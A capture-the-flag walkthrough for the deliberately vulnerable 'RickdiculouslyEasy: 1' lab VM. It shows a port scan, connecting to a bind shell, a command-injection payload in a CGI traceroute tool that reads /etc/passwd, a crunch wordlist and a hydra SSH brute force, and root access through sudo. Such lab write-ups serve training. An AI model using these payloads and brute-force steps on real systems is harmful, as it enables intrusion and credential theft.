RickdiculouslyEasy 1: CTF walkthrough

Introduction

Name: RickdiculouslyEasy: 1

Date of release: 21 Sep 2017

Author: Luke

Series: RickdiculouslyEasy


Recognition

We scan our local network to find the IP address of the vulnerable system.

arp-scan

In a second time we use nmap to find all services and open ports.

[email protected]:~/Desktop# nmap -A -O -p- -T5 --reason 192.168.1.45

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-14 17:53 CEST
Warning: 192.168.1.45 giving up on port because retransmission cap hit (2).
Stats: 0:02:38 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 94.59% done; ETC: 17:56 (0:00:09 remaining)
Nmap scan report for pc-246.home (192.168.1.45)
Host is up, received arp-response (0.011s latency).
Not shown: 65455 closed ports, 73 filtered ports
Reason: 65455 resets and 73 no-responses
PORT      STATE SERVICE REASON         VERSION
21/tcp    open  ftp     syn-ack ttl 64 vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 0        0              42 Aug 22 05:10 FLAG.txt
|_drwxr-xr-x    2 0        0               6 Feb 12  2017 pub
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.1.107
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp    open  ssh?    syn-ack ttl 64
| fingerprint-strings: 
|   NULL: 
|_    Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64)
80/tcp    open  http    syn-ack ttl 64 Apache httpd 2.4.27 ((Fedora))
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.27 (Fedora)
|_http-title: Morty's Website
9090/tcp  open  http    syn-ack ttl 64 Cockpit web service
|_http-title: Did not follow redirect to https://pc-246.home:9090/
13337/tcp open  unknown syn-ack ttl 64
| fingerprint-strings: 
|   NULL: 
|_    FLAG:{TheyFoundMyBackDoorMorty}-10Points
22222/tcp open  ssh     syn-ack ttl 64 OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey: 
|   2048 b4:11:56:7f:c0:36:96:7c:d0:99:dd:53:95:22:97:4f (RSA)
|   256 20:67:ed:d9:39:88:f9:ed:0d:af:8c:8e:8a:45:6e:0e (ECDSA)
|_  256 a6:84:fa:0f:df:e0:dc:e2:9a:2d:e7:13:3c:e7:50:a9 (EdDSA)
60000/tcp open  unknown syn-ack ttl 64
| fingerprint-strings: 
|   NULL, ibm-db2: 
|_    Welcome to Ricks half baked reverse shell...
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port22-TCP:V=7.60%I=7%D=10/14%Time=59E233EA%P=x86_64-pc-linux-gnu%r(NUL
SF:L,42,"Welcome\x20to\x20Ubuntu\x2014\.04\.5\x20LTS\x20\(GNU/Linux\x204\.
SF:4\.0-31-generic\x20x86_64\)\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port13337-TCP:V=7.60%I=7%D=10/14%Time=59E233EA%P=x86_64-pc-linux-gnu%r(
SF:NULL,29,"FLAG:{TheyFoundMyBackDoorMorty}-10Points\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port60000-TCP:V=7.60%I=7%D=10/14%Time=59E233F0%P=x86_64-pc-linux-gnu%r(
SF:NULL,2F,"Welcome\x20to\x20Ricks\x20half\x20baked\x20reverse\x20shell\.\
SF:.\.\n#\x20")%r(ibm-db2,2F,"Welcome\x20to\x20Ricks\x20half\x20baked\x20r
SF:everse\x20shell\.\.\.\n#\x20");
MAC Address: 24:0A:64:9E:6E:74 (AzureWave Technology)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT      ADDRESS
1   11.19 ms pc-246.home (192.168.1.45)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 266.46 seconds
[email protected]:~/Desktop#


FTP Service

An FTP service is with anonymous log in is accessible.

ftp service

Note, the pub directory is empty.

First flag: FLAG{Whoa this is unexpected} – 10 Points

10 out of 130.


Cockpit Web Service

An uncommon port is used for an HTTP service, let’s check this one.

cockpit web service

Second flag: FLAG{There is no Zeus, in your face!} – 10 Points

20 out of 130.


Unknown Port 13337

We found an open port, let’s try to connect to it.

[email protected]:~/Desktop# nc -nvv 192.168.1.45 13337
(UNKNOWN) [192.168.1.45] 13337 (?) open
FLAG:{TheyFoundMyBackDoorMorty}-10Points
 sent 0, rcvd 41
[email protected]:~/Desktop#

No more, no less.

Third flag: FLAG:{TheyFoundMyBackDoorMorty}-10Points

30 out of 130.


Unknown Port 60000

A bind shell publicly accessible? Interesting.

[email protected]:~/Desktop# nc -nvv 192.168.1.45 60000
(UNKNOWN) [192.168.1.45] 60000 (?) open
Welcome to Ricks half baked reverse shell...
# ls
FLAG.txt 
# cat FLAG.txt    
FLAG{Flip the pickle Morty!} - 10 Points 
#

It is a shell within an highly restrictive environment, therefore, only few commands are usable, such as ls, cat or whoami.

Fourth flag: FLAG{Flip the pickle Morty!} – 10 Points

40 out of 130.


‘Main’ Website

Ok, this time we have a true website. In a first time the robots.txt file can give use a really interesting information about the /cgi-bin/ directory, two tools seems to be usable.

[email protected]:~/Desktop# curl http://192.168.1.45/robots.txt
They're Robots Morty! It's ok to shoot them! They're just Robots!

/cgi-bin/root_shell.cgi
/cgi-bin/tracertool.cgi
/cgi-bin/*
[email protected]:~/Desktop#

We can also use gobuster to find the password directory.

Let’s see what we can find in this directory.

[email protected]:~/Desktop# curl http://192.168.1.45/passwords/FLAG.txt
FLAG{Yeah d- just don't do it.} - 10 Points
[email protected]:~/Desktop#

Moreover, we can find a password hidden in the source code.

[email protected]:~/Desktop# curl http://192.168.1.45/passwords/passwords.html
<!DOCTYPE html>
<html>
<head>
<title>Morty's Website</title>
<body>Wow Morty real clever. Storing passwords in a file called passwords.html? You've really done it this time Morty. Let me at least hide them.. I'd delete them entirely but I know you'd go bitching to your mom. That's the last thing I need.</body>
<!--Password: winter-->
</head>
</html>
[email protected]:~/Desktop#

Fifth flag: FLAG{Yeah d- just don’t do it.} – 10 Points

Our next step is the /cgi-bin directory. The first one, root_shell.cgi, is a lose of time but the second one allow us to use the tracert command via an HTML form.

We can easily find a vulnerability in this tool that will allow us to remotely execute commands on the server.

tracert rce

Lets enumerate the system and read files.

We will see that the cat command is unusable, fortunately for us, other commands can be use to read the content of a file, such as: less or more. Because less is more, lets try to read the /etc/passwd file with the less command.

[email protected]:/var/www/html# curl "http://192.168.1.45/cgi-bin/tracertool.cgi?ip=127.0.0.1%3Bless+%2Fetc%2Fpasswd"
[..snip..]
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-coredump:x:999:998:systemd Core Dumper:/:/sbin/nologin
systemd-timesync:x:998:997:systemd Time Synchronization:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:997:996:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
cockpit-ws:x:996:994:User for cockpit-ws:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
chrony:x:995:993::/var/lib/chrony:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
RickSanchez:x:1000:1000::/home/RickSanchez:/bin/bash
Morty:x:1001:1001::/home/Morty:/bin/bash
Summer:x:1002:1002::/home/Summer:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
[..snip..]
[email protected]:/var/www/html#

We have three users.

Lets try the previously found password with each one.

[email protected]:/var/www/html# ssh [email protected] -p 22222
[email protected]'s password: 
Last login: Wed Aug 23 19:20:29 2017 from 192.168.56.104
[[email protected] ~]$ id
uid=1002(Summer) gid=1002(Summer) groups=1002(Summer) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[[email protected] ~]$ ls -lah
total 20K
drwx------. 2 Summer Summer  99 Sep 15 11:49 .
drwxr-xr-x. 5 root   root    52 Aug 18 18:20 ..
-rw-------. 1 Summer Summer   1 Sep 15 11:51 .bash_history
-rw-r--r--. 1 Summer Summer  18 May 30 14:53 .bash_logout
-rw-r--r--. 1 Summer Summer 193 May 30 14:53 .bash_profile
-rw-r--r--. 1 Summer Summer 231 May 30 14:53 .bashrc
-rw-rw-r--. 1 Summer Summer  48 Aug 22 02:46 FLAG.txt
[[email protected] ~]$ cat FLAG.txt
                         _
                        | \
                        | |
                        | |
   |\                   | |
  /, ~\                / /
 X     `-.....-------./ /
  ~-. ~  ~              |
     \             /    |
      \  /_     ___\   /
      | /\ ~~~~~   \  |
      | | \        || |
      | |\ \       || )
     (_/ (_/      ((_/

[[email protected] ~]$ more FLAG.txt 
FLAG{Get off the high road Summer!} - 10 Points
[[email protected] ~]$

Sixth flag: FLAG{Get off the high road Summer!} – 10 Points

60 out of 130.


Morty Home Folder

We are in the system and we have three users, let’s try the home directory of Morty.

[[email protected] Morty]$ ls -la
total 64
drwxr-xr-x. 2 Morty Morty   131 Sep 15 11:49 .
drwxr-xr-x. 5 root  root     52 Aug 18 18:20 ..
-rw-------. 1 Morty Morty     1 Sep 15 11:51 .bash_history
-rw-r--r--. 1 Morty Morty    18 May 30 14:53 .bash_logout
-rw-r--r--. 1 Morty Morty   193 May 30 14:53 .bash_profile
-rw-r--r--. 1 Morty Morty   231 May 30 14:53 .bashrc
-rw-r--r--. 1 root  root    414 Aug 22 03:06 journal.txt.zip
-rw-r--r--. 1 root  root  43145 Aug 22 03:04 Safe_Password.jpg
[[email protected] Morty]$

We have a password protected zip file and an interesting password stored in a JPG file.

Actually, not really safe or protected.

safe password jpg

The password is: Meeseek.

We are now able to unzip the file.

[[email protected] Morty]$ unzip journal.txt.zip -d /tmp/
Archive:  journal.txt.zip
[journal.txt.zip] journal.txt password: 
  inflating: /tmp/journal.txt        
[[email protected] Morty]$ more /tmp/journal.txt 
Monday: So today Rick told me huge secret. He had finished his flask and was on to commercial grade pain
t solvent. He spluttered something about a safe, and a password. Or maybe it was a safe password... Was 
a password that was safe? Or a password to a safe? Or a safe password to a safe?

Anyway. Here it is:

FLAG: {131333} - 20 Points 
[[email protected] Morty]$

Seventh flag: FLAG: {131333} – 20 Points

80 out of 130.


Rick Home Folder

The content of the rick’s home folder.

[[email protected] RickSanchez]$ ls -lahR
.:
total 12K
drwxr-xr-x. 4 RickSanchez RickSanchez 113 Sep 21 10:30 .
drwxr-xr-x. 5 root        root         52 Aug 18 18:20 ..
-rw-r--r--. 1 RickSanchez RickSanchez  18 May 30 14:53 .bash_logout
-rw-r--r--. 1 RickSanchez RickSanchez 193 May 30 14:53 .bash_profile
-rw-r--r--. 1 RickSanchez RickSanchez 231 May 30 14:53 .bashrc
drwxr-xr-x. 2 RickSanchez RickSanchez  18 Sep 21 09:50 RICKS_SAFE
drwxrwxr-x. 2 RickSanchez RickSanchez  26 Aug 18 20:26 ThisDoesntContainAnyFlags

./RICKS_SAFE:
total 12K
drwxr-xr-x. 2 RickSanchez RickSanchez   18 Sep 21 09:50 .
drwxr-xr-x. 4 RickSanchez RickSanchez  113 Sep 21 10:30 ..
-rwxr--r--. 1 RickSanchez RickSanchez 8.5K Sep 21 10:24 safe

./ThisDoesntContainAnyFlags:
total 4.0K
drwxrwxr-x. 2 RickSanchez RickSanchez  26 Aug 18 20:26 .
drwxr-xr-x. 4 RickSanchez RickSanchez 113 Sep 21 10:30 ..
-rw-rw-r--. 1 RickSanchez RickSanchez  95 Aug 18 20:26 NotAFlag.txt
[[email protected] RickSanchez]$

As we can see, we have an ELF binary called safe.

Lets upload this binary into my Linux.

[[email protected] RickSanchez]$ exit
logout
Connection to 192.168.1.45 closed.
[email protected]:~/Desktop# 
[email protected]:~/Desktop# scp -P22222 [email protected]:/home/RickSanchez/RICKS_SAFE/safe .
[email protected]'s password: 
safe                                                                  100% 8704   845.6KB/s   00:00    
[email protected]:~/Desktop#

We execute the binary, and apparently we need to use an argument.

[email protected]:~/Desktop# ./safe 
Past Rick to present Rick, tell future Rick to use GOD DAMN COMMAND LINE AAAAAHHAHAGGGGRRGUMENTS!
[email protected]:~/Desktop#

Lets try with the previously found hint.

[email protected]:~/Desktop# ./safe 131333
decrypt:     FLAG{And Awwwaaaaayyyy we Go!} - 20 Points

Ricks password hints:
 (This is incase I forget.. I just hope I don't forget how to write a script to generate potential passwords. Also, sudo is wheely good.)
Follow these clues, in order


1 uppercase character
1 digit
One of the words in my old bands name.�    @
[email protected]:~/Desktop#

Now, we have to find the Rick’s password.

Eight flag: FLAG{And Awwwaaaaayyyy we Go!} – 20 Points

100 out of 130.


Rick’s Password

One of the best tools installed on Kali Linux for password generation is crunch. This is the tool that I will use for the Rick’s password. So, we need to have one uppercase, one digit and one word of the old Morty’s band.

  • If, like me, you didn’t watch the show: you can find the name here: http://rickandmorty.wikia.com/wiki/The_Flesh_Curtains

According to the crunch’s man page, we can choose our the desired pattern, maximum and minimum length.

DESCRIPTION
       Crunch  can  create  a  wordlist based on criteria you specify.  The output from crunch can be
       sent to the screen, file, or to another program.  The required parameters are:

       min-len
              The minimum length string you want crunch to start at.  This option  is  required  even
              for parameters that won't use the value.

       max-len
              The  maximum length string you want crunch to end at.  This option is required even for
              parameters that won't use the value.

       charset string

[..snip..]

        -t @,%^
              Specifies  a  pattern,  eg:  @@[email protected]@@@  where  the only the @'s, ,'s, %'s, and ^'s will
              change.
              @ will insert lower case characters
              , will insert upper case characters
              % will insert numbers
              ^ will insert symbols

We can generate two dictionary, one with the Flesh word and another one with the Curtains word.

[email protected]:~/Desktop# crunch 7 7 -t ,%Flesh -o flesh.txt
Crunch will now generate the following amount of data: 2080 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260 

crunch: 100% completed generating output
[email protected]:~/Desktop# crunch 10 10 -t ,%Curtains -o curtains.txt
Crunch will now generate the following amount of data: 2860 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260 

crunch: 100% completed generating output
[email protected]:~/Desktop#

Finally we can use hydra for a dictionary attack on the SSH service.

[email protected]:~/Desktop# hydra -l RickSanchez -P merged.txt ssh://192.168.1.45 -s 22222
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-10-14 22:40:42
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 780 login tries (l:1/p:780), ~49 tries per task
[DATA] attacking ssh://192.168.1.45:22222/
[22222][ssh] host: 192.168.1.45   login: RickSanchez   password: P7Curtains
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2017-10-14 22:41:18
[email protected]:~/Desktop#

Fortunately for us, the merged file (both generated dictionaries) contain only 780 entries and in less than a minute we can find the Rick’s password.

Username Password
RickSanchez P7Curtains


Last Flag

For this last flag, we don’t need a tricky hack or a complex exploit. Always thinking of basics things.

Rick is a super user, so, we only need to make it be a super user with the sudo command.

[email protected]:~/Desktop# ssh [email protected] -p 22222
[email protected]'s password: 
Last login: Sun Oct 15 07:44:36 2017 from 192.168.1.107
[[email protected] ~]$ sudo su
[sudo] password for RickSanchez: 
[[email protected] RickSanchez]# 
[[email protected] RickSanchez]# more /root/FLAG.txt 
FLAG: {Ionic Defibrillator} - 30 points
[[email protected] RickSanchez]#

In few seconds we have a root access to the system and the last flag.

Ninth flag: FLAG: {Ionic Defibrillator} – 30 points

root



break

Comments